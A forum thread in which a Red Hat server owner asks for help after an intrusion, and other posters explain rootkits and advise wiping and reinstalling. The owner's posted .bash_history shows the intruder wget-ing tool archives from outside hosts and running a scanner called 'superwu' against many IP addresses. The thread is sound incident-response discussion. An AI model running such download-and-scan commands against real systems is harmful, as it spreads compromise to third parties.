Intruder

[weifan]

I have redhat 7.1 for my server for years. However, recently I found out one intruder got into my box and changed my password and installed something in my system. My system was busy in scanning the whole world, before I un-pluged the cable. I also got complain from my ISP.

Right now, I could change my password by using single mode. I need to clean up whatever he did it on my system. Can someone please direct me the way to do it? I can not re-install my box, since I have put some important stuffs in my box.

TIA

Roger

 

[sleipnir214]

Unless you are very technically savvy about the ins and outs of resecuring the server, you'd probably be effort-ahead to just backup your data somewhere and reinstall.

Once someone's gotten root access to your box, there's no end to the damage he can do. Suppose this person recompiled the "ls" command so that it does something in the background every time it produces file listings in the foreground? How would you know, unless you were aware of the filesize and checksum of the original file?

Want the best answers? Ask the best questions:

http://www.catb.org/~esr/faqs/smart-questions.html

TANSTAAFL!!

 

[santoshdj123]

Use history file to know what he did and do the opposite of that.
OR ssh your own box and by using up arrow key it will show the commands what that intruder did.

 

[lullysing]

The more knowledge i get about rootkits, and the more paranoid i get about things. A good rootkit will :

- Modify all/almost all system monitoring tool by recompiling them using trojanned sources. Think anything from ls , top, touch, ps, to vi, cat, grep etc.
- Either create another UID 0 account, or obtain the root password ( either by keystroking or password cracking) so no alterations of the /etc/passwd and /etc/shadow files will be detected
- Nuke/compromise known checksum-based integrity checker by modifying the database directly ( you did keep a copy of the tripwire DB out of your system, rriigghhttt? )
- Install backdoors / bots / foo
- Fix original exploit so the new owner can't get him new shiny box ownzored back.

Learning the extent of the damage will probably be a leaving experience. but it depends on how much time you are willing to give it : Can you spare the infected box and rebuild another while you study your "patient" ?

_____________________________
when someone asks for your username and password, and much *clickely clickely* is happening in the background, know enough that you should be worried.

 

[mrregan]

Look in /var/log:
check out messages, secure, and xferlog files.
plug your cable back in temporarily and run top to see what programs are running.

 

[weifan]

Thank you for your help.

I will try to educate myself from whatever you posted here.

Roger

 

[weifan]

I still need your help!

Since I can not reinstall my box, I have to fix it.

I found out the intruder created one subdirectory "...]" under root and left some files.

Some of the files:
Am.tgz
KaX.tgz
Liviu.tgz
apache.tgz
cnxmass.tgz
liv.tgz
mefy.tgz
psyBNC.tar.gz
stringer.tar.gz
superwu
ussl.tgz
windmilk.tgz

I also found out the file .bash_history under root recorded whatever he did from my linux box.

Can anyone tell me what did he try to do? Can I still have my linux box back? How to do it?

TIA

Roger

 

[thedaver]

Everybody has and will still tell you to FORMAT the drive(s) and rebuild the box.

Any attempts to "save" a hacked/rooted box (without a tremendous amount of experience) are foolish. Rootkits often leave their payloads in more than just one place.

Not dissing you for being hacked, but you've spent 18 days trying to save a box that sleipnir214 rightfully told you to immediately kill off and reinstall.

SPAMMERS ARE NOW USING HACKED BOXES TO SPREAD SPAM AND ATTACK RBL/DNSBL LISTS WITH DENIALS OF SERVER TO SHUT THEM DOWN.

PLEASE do not contribute to the problems on the Internet.

Good luck!

Surfinbox.com Business Internet Services - National Dialup, DSL, T-1 and more.

http://www.surfinbox.com/business/

 

[lullysing]

all of those files are trojanned applications/rootkits that have most probably been installed on your system.

Check the bash history file and post it here please...PLEASE FORMAT TO THE PART WHERE HE DID STUFF ( don't copy paste the whole thing)

_____________________________
when someone asks for your username and password, and much *clickely clickely* is happening in the background, know enough that you should be worried.

 

[weifan]

Before I can post the file .bash_history, I need to know how to get the file. Only way I can get it is by hand writing.

Roger

 

[lullysing]

Put in a diskette in your floppy drive.

$mount /dev/fd0 /some/directory/
$su
# cp /root/.bash_history /some/directory
#su user
$umount /dev/fd0

Take out the floppy and look at it from ANOTHER MACHINE ( because if your machines has been rooted, any application in there could have been trojanned.


_____________________________
when someone asks for your username and password, and much *clickely clickely* is happening in the background, know enough that you should be worried.

 

[weifan]

This is the first part of the file:
./portmap
./portmap
./portmap
uptime
ls
cd ...]
ls
wget balder.prohosting.com/tzonfi/windmilk.tgz
wget balder.prohosting.com/tzonfi/tzonfi/windmilk.tgz
tar -xzvf windmilk.tgz
./superwu 61.220.99.170 21
./superwu 206.166.206.250 21
./superwu 61.80.0.0
cd ...]
ls
./superwu 61.110.0.0
./superwu 61.110.0.0
sh
./superwu 61.110.0.0
bash
rm -rf superwu
tar zxfv windmilk.tgz
./superwu 61.110.0.0
./superwu 61.210.0.0
./superwu 61.211.252.80
wget kastorex.org/KaX.tgz
ls
mv verboot/ liv
ls
tar -cf liv.tar liv/; gzip -9 liv.tar; mv liv.tar.gz liv.tgz
ls
ftp
./superwu 61.211.252.80
./superwu 61.211.252.81
uptime
cd ...]
ls
./superwu 203.124.108.252 21
rm -rf superwu
tar zxfv windmilk.tgz
./superwu 203.124.108.252 21
ls
./superwu 210.217.90.14 21
./superwu 210.217.90.14 21
rm - rf superwu
tar zxvf windmilk.tgz
./superwu 210.217.90.14 21
./superwu 61.80.51.145 21
./superwu 205.240.74.187 21
./superwu 61.111.18.27 21
./superwu 61.11.18.27 21
./superwu 61.11.18.27 21
./superwu 61.11.18.27 21
./superwu 61.211.252.80 21
./superwu 61.211.252.80
./superwu 61.211.252.81
cd ...]
ls
./superwu 200.87.144.100 21
rm -rf superwu
tar zxfv windmilk.tgz
./superwu 200.87.144.100 21
./superwu 66.252.11.231
./superwu 68.165.75.123 21
./superwu 68.165.99.225
cd ...]
ls
./superwu 68.165.99.225
rm -rf superwu
tar zxfv windmilk.tgz
./superwu 68.165.99.225
./superwu 68.165.99.226
PATH=ATH
"atl "
exit
cd ...]
./superwu 68.165.99.225
./superwu 68.120.226.200
./superwu 68.120.226.200
./superwu 68.120.226.200
./superwu 68.120.226.20 21
./superwu 68.120.226.20 21
./superwu 68.120.226.20 21
./superwu 68.120.226.20 21
./superwu 204.60.97.66
./superwu 217.32.198.201 21
./superwu 217.132.151.172
mkdir .bb
cd .bb
wget

http://www.rho-team.org/atl.tgz

tar zxvf atl.tgz
cd atl
pico psybnc.conf
sh
cd ...]
ls

Does anyone want the whole thing?

http://www.dynapost.com/temp/bash_history.txt

Thank you for your help!

Roger

 

[lullysing]

ooohhhh boy.
You are quite fucked man, sorry to say it crude like that, but it's the truth. I dunno what all those tgz have as payload, but just looking at the list makes me really, REALLY uncomfortable. The only blessings you should be able to count on is the fact that whoever did this was most probably a script kiddie, since he did not wipe the history logs.

ok, save all the tgz files someplace ( i'll probably sacrifice a box to see what those things could do and report about it for curiosity's sakes ) , amongs with any logs and important data you may need, and nuke the box. Save the data, kill the box.

*hears protestations about this being an important swerver for xyz reason*
No no, I don't give a damn about this being an important server, you NUKE THE !@#$!@#$ out of it, NOW. Delete all the partitions on that hard disk : every single one of them.

Then reinstall from scratch. And make sure you keep your accessible executables fully patched. Thedaver is right: this box should have died last week. Now do us all a favor and proceed with the last rites...

He's dead Jim
Dr. McCoy

_____________________________
when someone asks for your username and password, and much *clickely clickely* is happening in the background, know enough that you should be worried.